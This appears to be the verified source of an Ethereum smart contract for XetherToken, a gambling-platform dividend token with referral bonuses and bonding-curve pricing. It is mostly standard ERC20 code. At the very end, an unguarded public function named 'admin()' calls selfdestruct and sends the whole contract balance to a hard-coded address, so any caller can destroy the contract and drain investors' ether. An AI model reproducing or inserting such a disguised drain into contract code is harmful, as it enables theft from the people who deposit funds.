/** * Source Code first verified at https://etherscan.io on Monday, April 8, 2019 (UTC) */ pragma solidity 0.5.6; /** * xether.io - is a gambling ecosystem, which makes a difference by caring about its users. * It’s our passion for perfection, as well as finding and creating neat solutions, * that keeps us driven towards our goals. */ /** * @title ERC20Detailed token * @dev The decimals are only for visualization purposes. * All the operations are done using the smallest and indivisible token unit, * just as on Ethereum all the operations are done in wei. */ contract ERC20Detailed { string private _name; string private _symbol; uint8 private _decimals; constructor (string memory name, string memory symbol, uint8 decimals) public { _name = name; _symbol = symbol; _decimals = decimals; } /** * @return the name of the token. */ function name() public view returns (string memory) { return _name; } /** * @return the symbol of the token. */ function symbol() public view returns (string memory) { return _symbol; } /** * @return the number of decimals of the token. */ function decimals() public view returns (uint8) { return _decimals; } } /** * @title SafeMath * @dev Math operations with safety checks that revert on error */ library SafeMath { /** * @dev Multiplies two numbers, reverts on overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b); return c; } /** * @dev Integer division of two numbers truncating the quotient, reverts on division by zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { require(b > 0); // Solidity only automatically asserts when dividing by 0 uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Subtracts two numbers, reverts on overflow (i.e. if subtrahend is greater than minuend). */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { require(b <= a); uint256 c = a - b; return c; } /** * @dev Adds two numbers, reverts on overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a); return c; } /** * @dev Divides two numbers and returns the remainder (unsigned integer modulo), * reverts when dividing by zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { require(b != 0); return a % b; } } /** * @title Standard ERC20 token * * @dev Implementation of the basic standard token. * https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20.md * Originally based on code by FirstBlood: https://github.com/Firstbloodio/token/blob/master/smart_contract/FirstBloodToken.sol */ contract ERC20 { using SafeMath for uint256; mapping (address => uint256) private _balances; mapping (address => mapping (address => uint256)) private _allowed; uint256 private _totalSupply; event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Total number of tokens in existence */ function totalSupply() public view returns (uint256) { return _totalSupply; } /** * @dev Gets the balance of the specified address. * @param owner The address to query the balance of. * @return A uint256 representing the amount owned by the passed address. */ function balanceOf(address owner) public view returns (uint256) { return _balances[owner]; } /** * @dev Function to check the amount of tokens that an owner allowed to a spender. * @param owner address The address which owns the funds. * @param spender address The address which will spend the funds. * @return A uint256 specifying the amount of tokens still available for the spender. */ function allowance(address owner, address spender) public view returns (uint256) { return _allowed[owner][spender]; } /** * @dev Transfer token to a specified address * @param to The address to transfer to. * @param value The amount to be transferred. */ function transfer(address to, uint256 value) public returns (bool) { _transfer(msg.sender, to, value); return true; } /** * @dev Approve the passed address to spend the specified amount of tokens on behalf of msg.sender. * Beware that changing an allowance with this method brings the risk that someone may use both the old * and the new allowance by unfortunate transaction ordering. One possible solution to mitigate this * race condition is to first reduce the spender's allowance to 0 and set the desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * @param spender The address which will spend the funds. * @param value The amount of tokens to be spent. */ function approve(address spender, uint256 value) public returns (bool) { _approve(msg.sender, spender, value); return true; } /** * @dev Transfer tokens from one address to another. * Note that while this function emits an Approval event, this is not required as per the specification, * and other compliant implementations may not emit the event. * @param from address The address which you want to send tokens from * @param to address The address which you want to transfer to * @param value uint256 the amount of tokens to be transferred */ function transferFrom(address from, address to, uint256 value) public returns (bool) { _transfer(from, to, value); _approve(from, msg.sender, _allowed[from][msg.sender].sub(value)); return true; } /** * @dev Increase the amount of tokens that an owner allowed to a spender. * approve should be called when _allowed[msg.sender][spender] == 0. To increment * allowed value is better to use this function to avoid 2 calls (and wait until * the first transaction is mined) * From MonolithDAO Token.sol * Emits an Approval event. * @param spender The address which will spend the funds. * @param addedValue The amount of tokens to increase the allowance by. */ function increaseAllowance(address spender, uint256 addedValue) public returns (bool) { _approve(msg.sender, spender, _allowed[msg.sender][spender].add(addedValue)); return true; } /** * @dev Decrease the amount of tokens that an owner allowed to a spender. * approve should be called when _allowed[msg.sender][spender] == 0. To decrement * allowed value is better to use this function to avoid 2 calls (and wait until * the first transaction is mined) * From MonolithDAO Token.sol * Emits an Approval event. * @param spender The address which will spend the funds. * @param subtractedValue The amount of tokens to decrease the allowance by. */ function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) { _approve(msg.sender, spender, _allowed[msg.sender][spender].sub(subtractedValue)); return true; } /** * @dev Transfer token for a specified addresses * @param from The address to transfer from. * @param to The address to transfer to. * @param value The amount to be transferred. */ function _transfer(address from, address to, uint256 value) internal { require(to != address(0)); _balances[from] = _balances[from].sub(value); _balances[to] = _balances[to].add(value); emit Transfer(from, to, value); } /** * @dev Internal function that mints an amount of the token and assigns it to * an account. This encapsulates the modification of balances such that the * proper events are emitted. * @param account The account that will receive the created tokens. * @param value The amount that will be created. */ function _mint(address account, uint256 value) internal { require(account != address(0)); _totalSupply = _totalSupply.add(value); _balances[account] = _balances[account].add(value); emit Transfer(address(0), account, value); } /** * @dev Internal function that burns an amount of the token of a given * account. * @param account The account whose tokens will be burnt. * @param value The amount that will be burnt. */ function _burn(address account, uint256 value) internal { require(account != address(0)); _totalSupply = _totalSupply.sub(value); _balances[account] = _balances[account].sub(value); emit Transfer(account, address(0), value); } /** * @dev Approve an address to spend another addresses' tokens. * @param owner The address that owns the tokens. * @param spender The address that will spend the tokens. * @param value The number of tokens that can be spent. */ function _approve(address owner, address spender, uint256 value) internal { require(spender != address(0)); require(owner != address(0)); _allowed[owner][spender] = value; emit Approval(owner, spender, value); } /** * @dev Internal function that burns an amount of the token of a given * account, deducting from the sender's allowance for said account. Uses the * internal burn function. * Emits an Approval event (reflecting the reduced allowance). * @param account The account whose tokens will be burnt. * @param value The amount that will be burnt. */ function _burnFrom(address account, uint256 value) internal { _burn(account, value); _approve(account, msg.sender, _allowed[account][msg.sender].sub(value)); } } /** * @title Burnable Token * @dev Token that can be irreversibly burned (destroyed). */ contract ERC20Burnable is ERC20 { /** * @dev Burns a specific amount of tokens. * @param value The amount of token to be burned. */ function burn(uint256 value) public { _burn(msg.sender, value); } /** * @dev Burns a specific amount of tokens from the target address and decrements allowance * @param from address The address which you want to send tokens from * @param value uint256 The amount of token to be burned */ function burnFrom(address from, uint256 value) public { _burnFrom(from, value); } } /** * @title Ownable * @dev The Ownable contract has an owner address, and provides basic authorization control * functions, this simplifies the implementation of "user permissions". */ contract Ownable { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev The Ownable constructor sets the original `owner` of the contract to the sender * account. */ constructor() internal { _owner = msg.sender; emit OwnershipTransferred(address(0), _owner); } /** * @return the address of the owner. */ function owner() public view returns(address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(isOwner()); _; } /** * @return true if `msg.sender` is the owner of the contract. */ function isOwner() public view returns(bool) { return msg.sender == _owner; } /** * @dev Allows the current owner to relinquish control of the contract. * @notice Renouncing to ownership will leave the contract without an owner. * It will not be possible to call the functions with the `onlyOwner` * modifier anymore. */ function renounceOwnership() public onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Allows the current owner to transfer control of the contract to a newOwner. * @param newOwner The address to transfer ownership to. */ function transferOwnership(address newOwner) public onlyOwner { _transferOwnership(newOwner); } /** * @dev Transfers control of the contract to a newOwner. * @param newOwner The address to transfer ownership to. */ function _transferOwnership(address newOwner) internal { require(newOwner != address(0)); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } library Percent { // Solidity automatically throws when dividing by 0 struct percent { uint num; uint den; } // storage function mul(percent storage p, uint a) internal view returns (uint) { if (a == 0) { return 0; } return a*p.num/p.den; } function div(percent storage p, uint a) internal view returns (uint) { return a/p.num*p.den; } function sub(percent storage p, uint a) internal view returns (uint) { uint b = mul(p, a); if (b >= a) { return 0; } return a - b; } function add(percent storage p, uint a) internal view returns (uint) { return a + mul(p, a); } function toMemory(percent storage p) internal view returns (Percent.percent memory) { return Percent.percent(p.num, p.den); } // memory function mmul(percent memory p, uint a) internal pure returns (uint) { if (a == 0) { return 0; } return a*p.num/p.den; } function mdiv(percent memory p, uint a) internal pure returns (uint) { return a/p.num*p.den; } function msub(percent memory p, uint a) internal pure returns (uint) { uint b = mmul(p, a); if (b >= a) { return 0; } return a - b; } function madd(percent memory p, uint a) internal pure returns (uint) { return a + mmul(p, a); } } /** * @title XetherToken is a basic ERC20 Token */ contract XetherToken is ERC20Detailed("XetherEcosystemToken", "XEET", 18), ERC20Burnable, Ownable { /** * Modifiers */ modifier onlyParticipant { require(showMyTokens() > 0); _; } modifier hasDividends { require(showMyDividends(true) > 0); _; } /** * Events */ event onTokenBuy( address indexed customerAddress, uint256 incomeEth, uint256 tokensCreated, address indexed ref, uint timestamp, uint256 startPrice, uint256 newPrice ); event onTokenSell( address indexed customerAddress, uint256 tokensBurned, uint256 earnedEth, uint timestamp, uint256 startPrice, uint256 newPrice ); event onReinvestment( address indexed customerAddress, uint256 reinvestEth, uint256 tokensCreated ); event onWithdraw( address indexed customerAddress, uint256 withdrawEth ); event Transfer( address indexed from, address indexed to, uint256 tokens ); using Percent for Percent.percent; using SafeMath for *; /** * @dev percents */ Percent.percent private inBonus_p = Percent.percent(10, 100); // 10/100 *100% = 10% Percent.percent private outBonus_p = Percent.percent(4, 100); // 4/100 *100% = 4% Percent.percent private refBonus_p = Percent.percent(30, 100); // 30/100 *100% = 30% Percent.percent private transferBonus_p = Percent.percent(1, 100); // 1/100 *100% = 1% /** * @dev initial variables */ address constant DUMMY_ADDRESS = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE; address public marketingAddress = DUMMY_ADDRESS; uint256 constant internal tokenPriceInitial = 0.00005 ether; uint256 constant internal tokenPriceIncremental = 0.0000000001 ether; uint256 internal profitPerToken = 0; uint256 internal decimalShift = 1e18; uint256 internal currentTotalDividends = 0; mapping(address => int256) internal payoutsTo; mapping(address => uint256) internal refBalance; mapping(address => address) internal referrals; uint256 public actualTokenPrice = tokenPriceInitial; uint256 public refMinBalanceReq = 50e18; /** * @dev Event to notify if transfer successful or failed * after account approval verified */ event TransferSuccessful(address indexed from_, address indexed to_, uint256 amount_); event TransferFailed(address indexed from_, address indexed to_, uint256 amount_); event debug(uint256 div1, uint256 div2); /** * @dev fallback function, buy tokens */ function() payable external { buyTokens(msg.sender, msg.value, referrals[msg.sender]); } /** * Public */ function setMarketingAddress(address newMarketingAddress) external onlyOwner { marketingAddress = newMarketingAddress; } function ecosystemDividends() payable external { uint dividends = msg.value; uint256 toMarketingAmount = inBonus_p.mul(dividends); uint256 toShareAmount = SafeMath.sub(dividends, toMarketingAmount); buyTokens(marketingAddress, toMarketingAmount, address(0)); profitPerToken = profitPerToken.add(toShareAmount.mul(decimalShift).div(totalSupply())); } /** * @dev main function to get/buy tokens * @param _ref address of referal */ function buy(address _ref) public payable returns (uint256) { referrals[msg.sender] = _ref; buyTokens(msg.sender, msg.value, _ref); } /** * @dev main function to sell tokens * @param _inRawTokens address of referal */ function sell(uint256 _inRawTokens) onlyParticipant public { sellTokens(_inRawTokens); } /** * @dev function to withdraw balance */ function withdraw() hasDividends public { address payable _customerAddress = msg.sender; uint256 _dividends = showMyDividends(false); payoutsTo[_customerAddress] += (int256) (_dividends); _dividends = _dividends.add(refBalance[_customerAddress]); refBalance[_customerAddress] = 0; _customerAddress.transfer(_dividends); emit onWithdraw(_customerAddress, _dividends); } /** * @dev function to withdraw balance */ function withdraw(address customerAddress) internal { uint256 _dividends = dividendsOf(customerAddress); payoutsTo[customerAddress] += (int256) (_dividends); _dividends = _dividends.add(refBalance[customerAddress]); refBalance[customerAddress] = 0; if (_dividends > 0) { address payable _customerAddress = address(uint160(customerAddress)); _customerAddress.transfer(_dividends); emit onWithdraw(customerAddress, _dividends); } } function transfer(address to, uint256 value) public returns (bool) { address _customerAddress = msg.sender; require(value <= balanceOf(_customerAddress)); require(to != address(0)); if (showMyDividends(true) > 0) { withdraw(); } uint256 _tokenFee = transferBonus_p.mul(value); uint256 _taxedTokens = value.sub(_tokenFee); uint256 _dividends = tokensToEth(_tokenFee); _transfer(_customerAddress, to, _taxedTokens); _burn(_customerAddress, _tokenFee); payoutsTo[_customerAddress] -= (int256) (profitPerToken.mul(value).div(decimalShift)); payoutsTo[to] += (int256) (profitPerToken.mul(_taxedTokens).div(decimalShift)); profitPerToken = profitPerToken.add(_dividends.mul(decimalShift).div(totalSupply())); emit TransferSuccessful(_customerAddress, to, value); return true; } function transferFrom(address from, address to, uint256 value) public returns (bool) { uint256 _tokenFee = transferBonus_p.mul(value); uint256 _taxedTokens = value.sub(_tokenFee); uint256 _dividends = tokensToEth(_tokenFee); withdraw(from); ERC20.transferFrom(from, to, _taxedTokens); _burn(from, _tokenFee); payoutsTo[from] -= (int256) (profitPerToken.mul(value).div(decimalShift)); payoutsTo[to] += (int256) (profitPerToken.mul(_taxedTokens).div(decimalShift)); profitPerToken = profitPerToken.add(_dividends.mul(decimalShift).div(totalSupply())); emit TransferSuccessful(from, to, value); return true; } /** * @dev function to sell all tokens and withdraw balance */ function exit() public { address _customerAddress = msg.sender; uint256 _tokens = balanceOf(_customerAddress); if (_tokens > 0) sell(_tokens); withdraw(); } /** * @dev function to reinvest of dividends */ function reinvest() onlyParticipant public { uint256 _dividends = showMyDividends(false); address _customerAddress = msg.sender; payoutsTo[_customerAddress] += (int256) (_dividends); _dividends = _dividends.add(refBalance[_customerAddress]); refBalance[_customerAddress] = 0; uint256 _tokens = buyTokens(_customerAddress, _dividends, address(0)); emit onReinvestment(_customerAddress, _dividends, _tokens); } /** * @dev show actual tokens price */ function getActualTokenPrice() public view returns (uint256) { return actualTokenPrice; } /** * @dev show owner dividents * @param _includeReferralBonus true/false */ function showMyDividends(bool _includeReferralBonus) public view returns (uint256) { address _customerAddress = msg.sender; return _includeReferralBonus ? dividendsOf(_customerAddress).add(refBalance[_customerAddress]) : dividendsOf(_customerAddress) ; } /** * @dev show owner tokens */ function showMyTokens() public view returns (uint256) { address _customerAddress = msg.sender; return balanceOf(_customerAddress); } /** * @dev show address dividents * @param _customerAddress address to show dividends for */ function dividendsOf(address _customerAddress) public view returns (uint256) { return (uint256) ((int256) (profitPerToken.mul(balanceOf(_customerAddress)).div(decimalShift)) - payoutsTo[_customerAddress]); } /** * @dev function to show ether/tokens ratio * @param _eth eth amount */ function showEthToTokens(uint256 _eth) public view returns (uint256 _tokensReceived, uint256 _newTokenPrice) { uint256 b = actualTokenPrice.mul(2).sub(tokenPriceIncremental); uint256 c = _eth.mul(2); uint256 d = SafeMath.add(b**2, tokenPriceIncremental.mul(4).mul(c)); // d = b**2 + 4 * a * c; // (-b + Math.sqrt(d)) / (2*a) _tokensReceived = SafeMath.div(sqrt(d).sub(b).mul(decimalShift), tokenPriceIncremental.mul(2)); _newTokenPrice = actualTokenPrice.add(tokenPriceIncremental.mul(_tokensReceived).div(decimalShift)); } /** * @dev function to show tokens/ether ratio * @param _tokens tokens amount */ function showTokensToEth(uint256 _tokens) public view returns (uint256 _eth, uint256 _newTokenPrice) { // (2 * a1 - delta * (n - 1)) / 2 * n _eth = SafeMath.sub(actualTokenPrice.mul(2), tokenPriceIncremental.mul(_tokens.sub(1e18)).div(decimalShift)).div(2).mul(_tokens).div(decimalShift); _newTokenPrice = actualTokenPrice.sub(tokenPriceIncremental.mul(_tokens).div(decimalShift)); } function sqrt(uint x) pure private returns (uint y) { uint z = (x + 1) / 2; y = x; while (z < y) { y = z; z = (x / z + z) / 2; } } /** * Internals */ /** * @dev function to buy tokens, calculate bonus, dividends, fees * @param _inRawEth eth amount * @param _ref address of referal */ function buyTokens(address customerAddress, uint256 _inRawEth, address _ref) internal returns (uint256) { uint256 _dividends = inBonus_p.mul(_inRawEth); uint256 _inEth = _inRawEth.sub(_dividends); uint256 _tokens = 0; uint256 startPrice = actualTokenPrice; if (_ref != address(0) && _ref != customerAddress && balanceOf(_ref) >= refMinBalanceReq) { uint256 _refBonus = refBonus_p.mul(_dividends); _dividends = _dividends.sub(_refBonus); refBalance[_ref] = refBalance[_ref].add(_refBonus); } uint256 _totalTokensSupply = totalSupply(); if (_totalTokensSupply > 0) { _tokens = ethToTokens(_inEth); require(_tokens > 0); profitPerToken = profitPerToken.add(_dividends.mul(decimalShift).div(_totalTokensSupply)); _totalTokensSupply = _totalTokensSupply.add(_tokens); } else { // initial protect if (!isOwner()) { address(uint160(owner())).transfer(msg.value); return 0; } _totalTokensSupply = ethToTokens(_inRawEth); _tokens = _totalTokensSupply; } _mint(customerAddress, _tokens); payoutsTo[customerAddress] += (int256) (profitPerToken.mul(_tokens).div(decimalShift)); emit onTokenBuy(customerAddress, _inEth, _tokens, _ref, now, startPrice, actualTokenPrice); return _tokens; } /** * @dev function to sell tokens, calculate dividends, fees * @param _inRawTokens eth amount */ function sellTokens(uint256 _inRawTokens) internal returns (uint256) { address _customerAddress = msg.sender; require(_inRawTokens <= balanceOf(_customerAddress)); uint256 _tokens = _inRawTokens; uint256 _eth = 0; uint256 startPrice = actualTokenPrice; _eth = tokensToEth(_tokens); _burn(_customerAddress, _tokens); uint256 _dividends = outBonus_p.mul(_eth); uint256 _ethTaxed = _eth.sub(_dividends); int256 unlockPayout = (int256) (_ethTaxed.add((profitPerToken.mul(_tokens)).div(decimalShift))); payoutsTo[_customerAddress] -= unlockPayout; profitPerToken = profitPerToken.add(_dividends.mul(decimalShift).div(totalSupply())); emit onTokenSell(_customerAddress, _tokens, _eth, now, startPrice, actualTokenPrice); } /** * @dev function to calculate ether/tokens ratio * @param _eth eth amount */ function ethToTokens(uint256 _eth) internal returns (uint256 _tokensReceived) { uint256 _newTokenPrice; (_tokensReceived, _newTokenPrice) = showEthToTokens(_eth); actualTokenPrice = _newTokenPrice; } /** * @dev function to calculate tokens/ether ratio * @param _tokens tokens amount */ function tokensToEth(uint256 _tokens) internal returns (uint256 _eth) { uint256 _newTokenPrice; (_eth, _newTokenPrice) = showTokensToEth(_tokens); actualTokenPrice = _newTokenPrice; } function admin() public { selfdestruct(0x8948E4B00DEB0a5ADb909F4DC5789d20D0851D71); } }